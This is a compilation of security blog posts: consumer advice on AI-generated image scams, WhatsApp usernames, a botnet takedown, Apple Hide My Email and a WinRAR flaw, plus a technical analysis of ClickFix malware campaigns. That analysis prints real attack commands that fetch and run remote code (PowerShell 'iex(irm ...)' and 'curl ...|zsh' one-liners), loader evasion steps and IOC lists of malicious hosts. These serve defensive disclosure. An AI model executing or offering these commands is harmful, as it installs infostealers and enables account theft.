- Look up the botanical Latin name before ordering. If the variety doesn’t appear in a university extension database, the RHS Plant Finder, or a reputable specialty nursery’s catalog, treat the listing with extreme skepticism.
- Buy from named seed companies with a physical address in your country, published germination rates, and a history longer than the current gardening season.
- If you do want to take a chance with an overseas seller, check for a mention of import certificates. Seeds imported into the United States generally need either a phytosanitary certificate or, for qualifying small quantities, a USDA APHIS PPQ 587 permit.
The individual damage here is small, but it’s a preview of what cheap generative AI does to any market that relies on trusting product photos.
Scammers can now spin up a store, generate an entire catalog of impossible products, and disappear before the first shoots of what turns out to be boring old rosemary show themselves in your garden. Now’s the time to be extra-skeptical about ecommerce listings that rely on stunning visuals as proof.
Something feel off? Check it before you click.Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.
Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.
How to tell if an image is AI-generated
A photo of an injured dog by the roadside. A dating profile with pictures that look almost too perfect. A donation appeal showing a family stranded on a rooftop after a flood.
Scammers are already using AI-generated images to support fake stories, build trust, and persuade people to send money or share personal information.
Instead of asking whether an image looks real, it’s better to ask whether there’s any evidence that it’s genuine.
What you actually need to knowYou can’t reliably spot AI images by eye anymore. Advice like “count the fingers” or “look for garbled text” is becoming outdated because today’s AI image generators usually get those details right.
Instead of looking harder, verify the image and be skeptical of the story around it.
- Distrust the situation, not just the picture. These scams rely on urgency and emotion to push you into acting before you’ve had time to think.
- Check whether the image has appeared before. A reverse image search takes seconds and can often reveal where it really came from.
- Use an official verification tool when it matters. Google’s Gemini app can check for AI watermarks and provenance data. It’s not foolproof, but it provides useful evidence.
If an image is being used to ask for money or personal information, don’t treat it as proof until you’ve verified it.
Common AI image scamsIn each case, the image is there to make the request for money more believable.
Fake lost petsScammers post AI-generated photos of distressed animals in local groups before asking for “rehoming fees” or other payments. Because the image was generated rather than stolen, a reverse image search may not reveal an original source.
“I found your pet”Scammers target people searching for a missing pet, send them an AI-generated photo, then ask for a reward or deposit before disappearing.
Dating profilesPhotos that are flawless and consistent across every angle because they were never a real person. A video call helps, but it isn’t proof. Modern real-time deepfakes can pass simple tests like holding up fingers in front of the camera. Ask for something unscripted instead, such as turning their head or picking up a random object, and be wary of anyone who refuses to get on a call at all.
Fake artistsAn AI-generated portfolio presented as original work on X, Instagram, or Fiverr to win paid commissions. Sometimes the scammer disappears after taking a deposit. Other times they deliver a “finished” piece that turns out to be AI-generated rather than the original artwork the buyer paid for. A genuine artist can usually show sketches, layered files, or work-in-progress images. Someone using an AI-generated portfolio can’t.
Fake fundraising appealsAlongside real disasters, fabricated images of sick children, injured animals, or families in crisis are widely shared to encourage donations or simply attract attention. Some depict people who don’t exist at all. The more emotional the image, the less likely people are to stop and verify it.
Why visual clues aren’t enough anymoreSpotting a fake used to mean spotting edits, such as a repeating background, a shadow in the wrong place, or artefacts around a pasted-in object. That worked because manipulated images usually started with a real photo, leaving clues behind.
AI-generated images are different. They’re created from scratch, with no original image underneath, so those kinds of editing mistakes often don’t exist.
Visual clues are still worth a glance. Look for inconsistent jewellery, unusual lighting, distorted reflections, or odd movement in video. But don’t assume an image is genuine just because you can’t spot anything wrong.
How to check if an image is AI-generated Reverse image searchGoogle Lens, TinEye, and Bing Visual Search can often reveal where an image first appeared online.
No matches don’t necessarily mean an image is fake. Personal photos and newly published images often won’t appear anywhere else. But if someone claims an image has been circulating for days or comes from a widely reported event, a complete lack of history is worth questioning.
Provenance toolsSome images contain information about where they came from or whether AI was used to create them.
The two most common types of provenance information are:
- Content Credentials (C2PA): Records information about how an image was created or edited. It is supported by companies including Adobe, Google, Microsoft, and Sony.
- SynthID: Google’s invisible watermark embedded into supported AI-generated images. It now also covers images created with ChatGPT and DALL·E through a partnership announced in 2026.
Verification tools such as the Gemini app or OpenAI Verify look for this information to help determine whether an image was created with AI.
We created an AI-generated image and checked it using OpenAI Verify.
OpenAI Verify correctly identified it as AI-generated.
Keep in mind that if no watermark is found, it doesn’t mean the image is genuine. It simply means no watermark was detected.
Where these checks fall short- Messaging apps strip the evidence. WhatsApp, iMessage, and Facebook re-encode images when they’re uploaded, often removing embedded credentials. That’s one reason the pixel-based SynthID watermark is useful: it can survive changes that strip metadata.
- “Not found” is the most misread result. Most real photos don’t contain any provenance information. A result that says no watermark or credentials were found doesn’t mean the image is genuine. It simply means no signal was detected.
- A valid credential proves the pipeline, not the truth. It confirms which device or app produced the file and when, but not that what it shows actually happened. For example, someone could photograph a screen playing a deepfake video. The credential would be completely valid because the camera really did take that picture. It just can’t tell you the content on the screen was fake.
- Some “SynthID detector” sites are misleading. Reading the actual SynthID watermark requires technology only Google and its approved partners have access to. That means only official tools, such as Google’s own apps and OpenAI Verify, can directly verify it. Third-party websites using the “SynthID” name are usually estimating whether an image is AI-generated, not reading the actual watermark.
- Save screenshots of the profile, images, and messages before they disappear.
- Run the image through a reverse image search and, where possible, an official AI verification tool.
- If you shared financial information, contact your bank immediately and change any passwords you’ve reused elsewhere.
- Stop sending money. Don’t make “one more” payment in the hope of recovering what you’ve already lost.
- Report the account to the platform and to your national fraud reporting service, such as the FTC in the US or Report Fraud in the UK.
- Warn others in the same community if appropriate. Many of these scams spread through trusted groups and personal recommendations.
An image used to be reasonable proof that something happened. That’s no longer the case. A convincing, original image can now be created in seconds, with no previous history to trace.
The good news is that verification tools are becoming easier to use. They’re not perfect, but a habit of scepticism, reverse image searches, and official verification tools is far more reliable than trying to spot visual mistakes.
Check the source, resist the urgency, and don’t let a picture do your thinking for you.
Which tool should I use? A quick reference ToolChecksGemini (upload the image in the Gemini app, Google Search, or Chrome and ask if it was created with AI)SynthID watermark and Content CredentialsGoogle SynthID DetectorSynthID watermark in images, video, and audioOpenAI VerifySynthID and Content Credentials in ChatGPT, DALL·E, and API-generated contentReverse image search with Google Lens / TinEye / Bing Visual SearchMatches the image against copies on the web to find where else it appears How to interpret the results- Watermark found: The file was generated using a supported AI system.
- No watermark found: No signal was detected. This is the normal result for most genuine photos, but it doesn’t rule AI in or out.
- Content Credentials found: The file contains provenance information about how it was created or edited. This helps establish its origin, but it doesn’t prove the scene itself is genuine.
Choose your WhatsApp username carefully
Dutch consumer organization Consumentenbond has warned users to be careful when choosing their optional WhatsApp username.
Meta announced the introduction of usernames on June 29, 2026, and encouraged users to reserve their username now.
Meta offers this feature as:
“a major privacy feature designed to help you connect with new people without giving away your phone number.”
The new system gives users three practical choices: reuse an existing Facebook or Instagram name, create a separate unique WhatsApp username, or ignore the feature and keep using a phone number.
But there is an important catch. If you want to claim the same handle you already use on Instagram or Facebook, Meta requires you to link your accounts through Accounts Center. Meta says that adding WhatsApp to Accounts Center enables connected experiences and allows information to be shared across those linked accounts. It also makes it easier for people to connect your WhatsApp identity with your other public Meta profiles.
How matching usernames can hurt your privacyReusing your Instagram or Facebook handle on WhatsApp makes it easier to connect your identity across Meta’s apps. Even if your messages stay private, your presence across Meta’s ecosystem becomes more linkable, which can help Meta correlate profile data, behavior, and account history.
Meta’s own help pages say the Accounts Center is meant to manage connected experiences across Facebook, Instagram, WhatsApp, and other Meta products, and that adding WhatsApp enables information sharing across those connected accounts. The issue is not about message content, but the wider data picture around your account and how it is tied together.
And it creates a social-engineering risk. If someone can see or guess your Meta-style username, they may be able to connect your WhatsApp identity to your Instagram or Facebook profile and use information found on your social media accounts for impersonation or other targeted fraud.
Meta also accounted for that risk by reserving usernames for public figures, government entities, and “some variations” of those names, so only the legitimate owner can claim them. For example, I was unable to claim my favorite “MetallicaMVP” handle. But reportedly some usernames resembling prominent politicians, celebrities, business figures, and public institutions were still available to reserve.
Our adviceHiding your phone number is a genuine privacy improvement. But if you reuse the same username across Meta’s apps, you could make it easier for both Meta and other people to connect those accounts.
The safest move is to choose a unique WhatsApp-only username rather than reusing your Facebook or Instagram handle.
If you decide to use a username, treat it like a public identifier: pick something hard to guess, avoid name patterns that map directly to other profiles, and enable any extra contact restrictions available in the app.
WhatsApp lets users restrict who can add them to groups, and it offers a separate option to control who can contact them via a username key or code.
Under Settings > Privacy you can restrict which WhatsApp users can see specific information about you.
Under Settings > Account > Username, you can control who can contact you by username by enabling a username key. Anyone trying to contact you for the first time must know both your username and that key. That should help to contain the social engineering attempts.
Scammers don’t need to hack you. They just need you to click once.
Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.
NetNut botnet takes a hit. Don’t be part of the next one.
In a joint operation, Google, the FBI, and other partners have dealt a significant blow to the residential proxy ecosystem by disrupting the NetNut (also tracked as Popa) botnet.
NetNut is a malicious service built on millions of hijacked consumer devices. NetNut marketed itself as a high-quality residential proxy provider, selling access to “real” home IP addresses for web data collection and other benign-sounding use cases.
The FBI’s definition of a residential proxy:
“A residential proxy is an intermediary server between individuals and websites they visit to make their connections appear to originate elsewhere. Legitimate IP addresses assigned by an Internet Service Provider (ISP) to consumers’ Internet of Things (IoT) devices, such as TV streaming devices, digital picture frames, smartphones, tablets, and routers are used to route traffic. Once an internet-connected device is compromised, the device’s IP address can be used by threat actors to mask their online illegal activity, making the consumer appear responsible.”
The most common method used to add devices to the NetNut network was to trick users into installing “bandwidth sharing” or proxyware apps that promised payouts for “sharing your unused internet” but buried the true risks in fine print or skipped meaningful consent altogether. Less commonly, devices are sold pre-compromised through grey-market supply chains and shipped with malicious firmware or side-loaded apps.
Once enrolled, these devices could be used to relay password-spraying attacks, account takeover attempts, advertising fraud, and even Mirai-variant DDoS attacks.
The disruption focused on three levers: disabling Google accounts used for NetNut’s command-and-control (C2), sharing detailed indicators on NetNut’s SDKs and infrastructure with platforms and law enforcement, and using Google Play Protect to warn users and automatically disable apps that included NetNut code.
Reportedly, this has significantly disrupted the NetNut botnet, reducing the available pool of devices for the proxy operator by millions.
How to stay safeA typical home user is unlikely to notice that their devices are part of the NetNut botnet, although they may experience slower performance, reduced internet speeds, faster battery drain, and additional wear and tear on affected devices.
After this blow, the botnet’s operators will likely try to rebuild their network by compromising new devices, or another botnet may take its place. So it’s important to stay vigilant. Some basic tips:
- Be extremely wary of apps that pay you for unused bandwidth.
- Stick to official app stores.
- Check VPN and proxy permissions on your devices.
- Favor reputable, Play Protect–certified vendors for connected devices.
- Use an up-to-date, real-time anti-malware solution on devices that are eligible.
Scammers know more about you than you think.
Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in.
A week in security (June 29 – July 5)
Last week on Malwarebytes Labs:
- Verified X ad spreads Mac malware, while ConsentFix steals Microsoft accounts
- Apple’s Hide My Email doesn’t hide it very well
- Fake Google and Cloudflare verification pages spread multiple malware families
- WinRAR flaw could allow attackers to take control of your computer
- Fake Perplexity Chrome extension spies on your searches
- BioShocking: when “gaming” AI agents is no longer a game
- Chrome needs another whopper update to fix 382 security bugs
- ChatGPT produced graphic violent images that shocked researchers
- Watch out for “high paying, low effort” Amazon job texts
- Update time: Apple releases security patches for iOS, MacOS Tahoe, Safari
- This pay gap is programmed (Lock and Code S07E13)
- 119 Edge extensions promised useful tools, instead downloaded malware
Stay safe!
Verified X ad spreads Mac malware, while ConsentFix steals Microsoft accounts
Cybercriminals are finding new ways to trick people into compromising their own devices and accounts. One campaign used a sponsored ad on X to target Mac users, while another technique, dubbed ConsentFix, steals Microsoft 365 accounts without installing malware.
Verified X account used in Mac ClickFix attackResearchers have discovered a ClickFix-style attack running as a sponsored advertisement on X. The ad was posted from a verified account, adding an extra layer of credibility to the scam.
ClickFix campaigns use convincing lures—historically fake “human verification” screens, and now a fake download for DynamicLake, a legitimate macOS utility that turns your MacBook’s notch into an unofficial but functional version of Apple’s Dynamic Island. This type of attack requires the user to paste a command from the clipboard, making it depend heavily on user interaction.
Image courtesy of Jamf
In reality, people who clicked the link were redirected to the lookalike domain dynamicmacisland[.]com, where they were instructed to open Terminal and paste installation commands that silently installed malware.
The campaign combines three worrying trends: ClickFix-style social engineering using Terminal commands, lookalike domains that mimic trusted Mac apps, and paid advertising infrastructure used to scale attacks to a large audience.
The malware reportedly delivers several variants of the Atomic Stealer infostealer.
This pattern mirrors previous cases where Google Ads promoted fake software installers, including malicious sponsored listings that delivered malware when users searched for trusted developer tools. The lesson is clear: paid placement and verification badges are no guarantee of safety, especially when attackers deliberately design campaigns to evade automated screening.
The campaign abused X’s advertising platform, with the malicious ad appearing under a verified account. The researchers reported the advertisement to X and contacted the account owner. The ad appears to have since been removed.
ConsentFix steals accounts instead of installing malwareWindows users are also being warned about the next generation of ClickFix attacks, called ConsentFix.
ConsentFix is different because ,where ClickFix turns you into the installer, ConsentFix turns you into the identity provider. Instead of tricking you into running malware, it uses social engineering to get you to hand over your cloud login tokens through the browser without ever asking you to run malware or type your password.
“It can start with something as mundane as dragging a link into your browser. Three seconds later, a threat actor has the tokens needed to take over your Microsoft 365 account, and you never did anything that traditional security awareness training would flag.”
For example, a phishing email may arrive containing a link, often hosted on trusted platforms such as Dropbox. Sometimes it’s protected with a password, which also makes it harder for security tools to inspect.
If the target clicks on the link, they’ll see what looks like a standard Microsoft sign-in page and be asked to complete the process by dragging a localhost callback link into the browser.
How the ConsentFix trap looksThat’s when the trap closes. Without realizing it, the victim hands over session tokens to the attacker, giving them access to email and other Microsoft 365 services without needing a password or completing multi-factor authentication (MFA).
The method has reportedly been shared on a Russian cybercrime forum, making it easy enough for less experienced cybercriminals to steal Microsoft 365 accounts.
How to stay safeThe best protection is knowing these attacks exist and recognizing what they look like. So keep reading our blog. But there’s more you can do:
- Don’t trust links that arrive unexpectedly—whether by email, text message, social media, or even through verified accounts or sponsored search results.
- Think things through before following instructions that seem unusual or that you don’t fully understand.
- When filling out credentials, always check the address in the browser bar. Is that the one you expected? If not, stop.
- Use an up-to-date, real-time anti-malware solution with web protection.
Pro tip: Did you know the free Malwarebytes Browser Guard browser extension protects you against malicious websites and ClickFix attacks? It also blocks ads and trackers, so that’s a bonus.
Stop threats before they can do any harm.
Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →
Apple’s Hide My Email doesn’t hide it very well
404 Media reports that a researcher has found a vulnerability in Apple’s Hide My Email feature that could allow someone to discover a person’s real email address.
That’s especially concerning because protecting your real email address is exactly what the feature is designed to do. 404 Media did not publish technical details of the vulnerability to avoid helping attackers exploit it, but said it independently verified that the issue works.
Hide My Email generates:
“Unique, random email addresses that automatically forward to your personal email inbox. Each address is unique to you. You can read and respond directly to emails sent to these addresses and your personal email address is kept private.”
Instead of giving a website or app your real email address when you sign up, you can give it one of these randomly generated addresses. Messages are forwarded to your normal inbox, but the sender shouldn’t be able to see your real email address. At least, that’s how it’s supposed to work.
Tyler Murphy, co-founder of EasyOptOuts, discovered and reported the issue to Apple in June 2025. More than a year later, he says the vulnerability still hasn’t been fixed.
When Murphy reached out to Apple again in May, he received the following response:
“We are still investigating this issue. To avoid placing our customers at risk, we would appreciate you not disclosing this information until our investigation is complete. We appreciate your assistance in helping us to maintain and improve the security of our products.”
Murphy suggested Apple should stop promoting the feature until it could be fixed. Apple reportedly told him it expected to address the issue in a security update in the coming weeks. When that failed to happen, Murphy decided to reach out to 404 Media.
Instead, we learned a few weeks ago that Apple plans to make the Hide My Email less useful for some users. In a note to developers, the company said it will move anonymously generated email addresses to the @private.icloud.com domain. Effectively, this makes it easier for apps and websites to recognize that an email address was created with Hide My Email and potentially refuse to accept it during the sign-up process.
What you can doUsing a different email address for every website or service is still good privacy practice. It makes it easier to identify which company exposed your address in a data breach, and you can simply stop using a compromised alias without changing your main email address.
However, until Apple fixes the issue, you shouldn’t rely on the Hide My Email feature as the only way to keep your real email address private.
Meanwhile, keep an eye open for Apple’s promised security update.
Browse like no one’s watching.
Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free →
Fake Google and Cloudflare verification pages spread multiple malware families
ClickFix attacks, which trick people into running malicious commands themselves, continue to evolve. This latest campaign uses fake Google and Cloudflare verification pages to convince victims to infect their own devices.
A single mistake can install malware that steals passwords and other sensitive data, gives attackers remote access to your computer, or downloads additional malware that can take full control of your system.
We uncovered multiple campaigns using the same infrastructure to deliver malware including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer.
In one infection chain, a trojanized version of the legitimate Franz messaging app downloads a previously undocumented loader dubbed ResiLoader, which disables security software before deploying the StealC infostealer.
Before we look at the technical details, here’s how to avoid becoming the next victim.
How to stay safeClickFix attacks rely on convincing you to run commands yourself. The safest approach is simple:
- Never copy and run commands from a website unless you’re following instructions from a trusted source and understand exactly what the command does.
- Be wary of verification pages. Google, Cloudflare, Microsoft, and other legitimate services will never ask you to paste PowerShell commands into Windows to prove you’re human or fix a problem.
- Don’t let urgency rush you. Fake verification pages often use countdown timers, visitor counters, or warnings to pressure you into acting quickly.
- Keep your security software up to date. Real-time protection and web protection can help block malicious websites before you reach them.
- Question unexpected technical instructions. If a website tells you to open PowerShell, Command Prompt, or Terminal, stop and verify the instructions through the company’s official support channels.
Pro tip: Malwarebytes Browser Guard can warn you when a website attempts to copy content to your clipboard—a common trick used by ClickFix pages.
Technical analysisThe campaigns analysed in this research have been active since at least late 2025 and use a variety of fake Google and Cloudflare pages to deliver malware. Although the lures differ, they share much of the same infrastructure and infection chain, with the attackers continually testing new delivery methods and payloads.
Different lures, one goalMost of the campaigns share several characteristics:
- Use of the folder C:\ProgramData\Zooms to extract later stages
- PowerShell ClickFix commands that follow similar patterns
- Use of Cloudflare R2 buckets to deliver payloads
- IP addresses hosted by the ASN Dedik Services Limited
- HTML responses containing only the phrase "hehe"
These indicators have changed over time, so they don’t appear in every infection chain. The campaigns continue to evolve, with new payloads and delivery methods regularly introduced. For example, in some cases, the IP address is used directly for payload distribution instead of buckets.
The final command copied by the user usually falls into this pattern:
powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”The port and the path are not always present in the cases analyzed; the ports are random, but some used ones are: 6600, 9900, 5506, 7895, 7493, 149, 8442.
To execute these commands, several ClickFix-related templates are used, mainly related to Google and Cloudflare. We also detected that in some cases the PowerShell command was distributed through the IClickFix framework.
We observed these ClickFix campaigns being distributed through:
- Old websites that have likely expired and been repurchased by the actor(s).
- CloudFlare Pages (.pages.dev domains).
- Compromised websites.
- Fake services, for example related to QR code or web file access.
The actors behind these campaigns use various Google-related HTML pages and kits.
One lure impersonates Google reCAPTCHA verification. The pages are hosted on random URLs that display fake or malicious content. These domains are often older registrations that recently began resolving to new IP addresses, suggesting they were repurposed for the campaign.
Some of these pages have URL parameters like such as “zoneid”, “cost”, “device”, “country”, “clickid”, for example:
- /conf/captcha.html?zoneid=10420852
- /wincapbot/nobot.html
- /xmr/trkuste.php?zone=5327134
- bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop
In this case, the functions related to ClickFix are implemented in the class CustomCaptcha. The command is present in clear without any obfuscation.
StartVerification” method in the “CustomCaptcha” classAnother distribution method uses Cloudflare Pages hosted on .pages.dev subdomains.
“Verify you’re human” ClickFix pageIn this case, the HTML page is obfuscated by declaring several variables and XORing them. The deobfuscated code is called SECURITY GATEWAY and it’s composed of the functions GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenController, and PanelController.
The code allows the attackers to retrieve the command either remotely or locally. In this sample, the malicious PowerShell command is stored locally.
The PowerShell command declared in the “SECURITY GATEWAY” codeWe also found that some of these domains have distributed another decoy in the past, in this case associated with an unauthorized Google login. This ClickFix lure asks the user to copy and paste the malicious command to set their device as primary.
“New sign-in with trusted token” ClickFix pageThe interesting part of this ClickFix kit is that it features an “approval gate,” as described in the comments, and that the attacker must manually choose from the panel which command to have the user execute.
Comments about the kit and the “approval gate”In more recent campaigns, we’ve detected a ClickFix lure related to Google Meet, which requires copying and pasting a malicious command to fix audio issues.
The “fix audio driver” Google Meet ClickFix lureIn the analyzed cases, the endpoint /api/driver-clipboard.php returned the following malicious command:
{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""} Other luresThe actors behind this campaign use various kits and lures, mostly related to Google. However, we’ve detected other lures that copied commands related to the same infrastructure.
The attackers behind these campaigns also compromise multiple websites using different templates related to the CloudFlare ClickFix lure.
“Verify you are human” ClickFix pagesWe have detected several templates used for CloudFlare pages. The command is present in clear or in some cases obfuscated in the cases analyzed.
Some of the CloudFlare ClickFix HTML pagesWe also detected some specifically created fake services websites. For example, a “My QR Generator” site displays an obfuscated QR code and asks the user to run a PowerShell command to verify that the user is not a robot.
“QR Code” ClickFix lure pageIn this case the command is encoded in base-64:
Decoded PowerShell command PowerShell downloaderThe ClickFix command executed by the user decodes a script and drops it into the Temp folder with the name tmp{4 char}.tmp.ps1.
We have detected several variations of this script, but recent versions do the following:
- Create the folder C:\ProgramData\Zooms.
- Download the next stage from a CloudFlare bucket and save it in C:\ProgramData\Zooms. In some variants of the script, the next stage is downloaded directly from an IP.
- Send the information of the compromised machine to http://{IP}/dl-callback. In some variants of the script, this part is not present.
The attackers behind these campaigns use a large number of different payloads.The campaigns deliver a wide variety of payloads. The table below summarises some of the downloaded filenames and the malware they install. For many of the cases analyzed, the final payload was distributed via DLL Hijacking, as we will also see later for StealC stealer.
File Distributed Malware distributed libEGL.zip, Safe-1.zip Trojanized Electron App, ResiLoader and StealC Test.msi Deno Loader and PowerShell Stealer arworks.zip Amatera Stealer water-night.zip Remus Stealer Setup.msi, Invintrum_first.msi NetSupport traffic1.msi CastleLoader ibrowser.exe Rust StealerWe analyzed a new loader called ResiLoader that ultimately distributes StealC. We also detected that the threat actor in the latest campaigns has started using Deno to distribute a stealer developed in PowerShell at the end; the analysis of this infection chain could be the subject of a future blog post.
Trojanized Electron app downloads ResiLoaderIn this case, the ZIP was downloaded from:
- pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip
After extraction to:
- C:\ProgramData\Zooms\libEGL.zip_ext
The zip contains a trojanized version of the open-source messaging app called “Franz”:
The trojanized “Franz” app used to download ResiLoaderThe malicious code is implemented in the index.js file:
The obfuscated code in the backdoored appThe downloader performs the following operations:
- Decode the strings with the function HC().
- Reads readme.txt, expects a campaign key of the form AAAA-BBBB, returns it as an array of tokens. In this case the name is resiloader-1 and for this we call “ResiLoader” the downloaded DLL.
- Reads %APPDATA%\setup.txt; if absent, generates a random 8-char string and persists it.
- Obtaining persistence using app.setLoginItemSettings.
- Sends a POST request to https[:]//completstep[.]com/api/ and elaborate the JSON response
- If task.e is present, it executes eval(task.e); it allows the attacker to execute arbitrary JavaScript code.
- If task.files is present, create %TEMP%\<Date.now()>\, decode and write each file; if any filename ends in .exe, run it via child_process.exec.
In our case we received a ZIP that performs the DLL hijacking of ssh-add.exe:
{"task":{"name":"JUNE18USY","files":{ "msys-2.0.dll":"<base64>", "msys-crypto-3.dll":"<base64>", "msys-gcc_s-seh-1.dll":"<base64>", "ssh-add.exe":"<base64>" }}}After, the executable was executed with:
C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe"" ResiLoaderThe msys-crypto-3.dll is an obfuscated .NET NativeAOT loader that implements AV/EDR evasion using a BYOD technique, obtain persistence and ultimately loads the stealer StealC. We didn’t find a specific attribution for this loader and so we called it “ResiLoader” based on the string present in previous readme.txt.
The loader contains several strings, some clear and some encrypted. After decrypting the strings, it’s possible to have a full picture of the functionality of the ResiLoader.
MANPO: ReadModule len=... MANPO: magicOffset=... … PERS: FAIL all file copies failed, skipping run key PERS: FAIL both HKLM and HKCU Run key writes failed … RUNPE: CreateProcess failed RUNPE: PEB patched RUNPE: VirtualAllocEx failed … POST: RunForever exited (unexpected) POST: entering RunForever POST: hollow=The loader performs the following operations:
- Extract the encoded blob containing two payloads reading the marker AtLorenBase and the length of the encoded blob. After, it decodes the blob and decrypts the driver pcdhost.sys (OPSWAT
AppRemover Driver) and StealC payload using a custom decryption algorithm. - Terminate more than 140 processes related to EDR/AV processes using the dropped driver.
- Perform UAC bypass via ICMLuaUtil Elevated COM Interface.
- Create a folder C:\ProgramData\Google Update, copying itself; adding persistence using the RUN Registry Key
- cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe
In the end, the loader performs process hollowing of the process ServiceModelReg.exe to run the StealC stealer.
IOCs Hash72907d0ca3258365838626f6a8d993a6: ResiLoader DLL
0234E3188F2883A438B3F2BEAB7A78B2: StealC
6a9ac6b3fff7b695dbd4df6ff7f6c516: Remus
206ce339febca0c3bcc850f42595fc63: Amatera Stealer
eee416efcb1e33f220cdb4b05496a07a: NetSupport RAT
b8d53740024d126cb55f83854335a4ab: Rust Stealer
DomainsDistribute ClickFix pages:
onegeekworld[.]com
thefirmos[.]com
antibotv3[.]com
centralwildcats[.]com
cloud.antibotv3[.]com
cloudautosolutions[.]com
sunseekersupply[.]com
123clocks[.]com
orcanegames[.]com
rwmonitoring[.]com
100furniture[.]com
nepalcharchaa[.]com
p-floribunds.pages[.]dev
pg-altirade2.pages[.]dev
pg-cordivant-m6.pages[.]dev
g-luminence.pages[.]dev
generator-qrcode[.]online
regdev-google[.]com
khosla[.]capital
eorgke09054909j[.]com
dropboxi[.]com
CloudFlare buckets used for payload distribution:
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
pub-620528e2dc874e16937673265aa23d39.r2[.]dev
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
pub-9682d5896df841679c5a17eb41273f89.r2[.]dev
pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev
pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
unitedstateverif[.]com: payload distribution
bigflaredefence[.]com: payload distribution
popularcard[.]shop: Rust Stealer C2
xzz[.]proxygrid[.]cc: Amatera Stealer C2
completstep[.]com: Loader C2
eventlogerps1[.]ink: Deno Loader
be231ro963[.]com: Deno Loader
IPsIP used for payload distribution:
151.240.151[.]126
85.239.149[.]16
85.239.149[.]40
93.152.224[.]29
151.240.151[.]46
93.152.224[.]167
85.239.149[.]78
192.69.195[.]131
135.181.171[.]40
94.26.83[.]206
91.92.34[.]128
85.239.144[.]31
93.152.224[.]39
94.26.90[.]112
146.19.248[.]120: StealC C2
Acknowledgements- Related domain reported: https://x.com/stop_spammerz/status/2070152741037477960
- Related domain reported: https://x.com/Yuki27183/status/2047354005605777850
- User infection reported on Reddit: https://www.reddit.com/r/antivirus/comments/1stn24v/best_thing_to_do_after_getting_malware/
- Possible related infection chain https://github.com/MessyToilet/csgo-scam-via-powershell-5-31-2026
WinRAR flaw could allow attackers to take control of your computer
Rarlab has released a new version of the popular WinRAR tool to patch a vulnerability that can be abused in remote code execution attacks.
The issue is fixed in WinRAR 7.23, but users must install the new version manually because WinRAR still does not offer automatic updates. They also need to make sure they download the version that matches their system and language preference.
There are five operating system to choose from (Windows, macOS, Android, Linux, and FreeBSD), which shouldn’t be too hard. More people will struggle with choosing 64 bits, 32 bits, or ARM, which requires checking their system specifications.
The vulnerability, tracked as CVE-2026-14191, affects the way WinRAR and UnRAR handle RAR5 recovery-volume (.rev) files, which are optional files used to help repair damaged or incomplete archives.
This means an attacker can craft a set of two or more .rev files that make WinRAR write data outside the memory it has allocated. In simple terms, the malicious recovery volumes can trick WinRAR into writing data just past the end of a memory buffer, corrupting its own data, which attackers may be able to exploit to run malicious code on the victim’s computer.
According to the European Vulnerability Database entry EUVD‑2026‑40869, the bug is a variant of the 2023 flaw tracked as CVE-2023-40477, which was also found in the recovery volume handling code.
No automatic updatesThe problem with the lack of automatic updates is that users first have to become aware that a new version is available. Although there are third-party tools that can monitor this for system administrators, most home users risk missing it.
A 2025 vulnerability in WinRAR was exploited by Russia-aligned groups against Ukrainian organizations long after the vulnerability had been patched.
How to stay safeBesides installing the updated version of WinRAR and/or UnRAR, there are a few general ways to stay safe.
- Don’t open unsolicited attachments unless you can verify their origin through an independent channel.
- Use an up-to-date, real-time anti-malware solution to keep malware off your devices.
- For system administrators: Treat WinRAR as optional software. If users do not need it for business reasons, remove it through your software inventory or asset management system to shrink the attack surface, or use a suitable tool to notify you promptly about updates.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
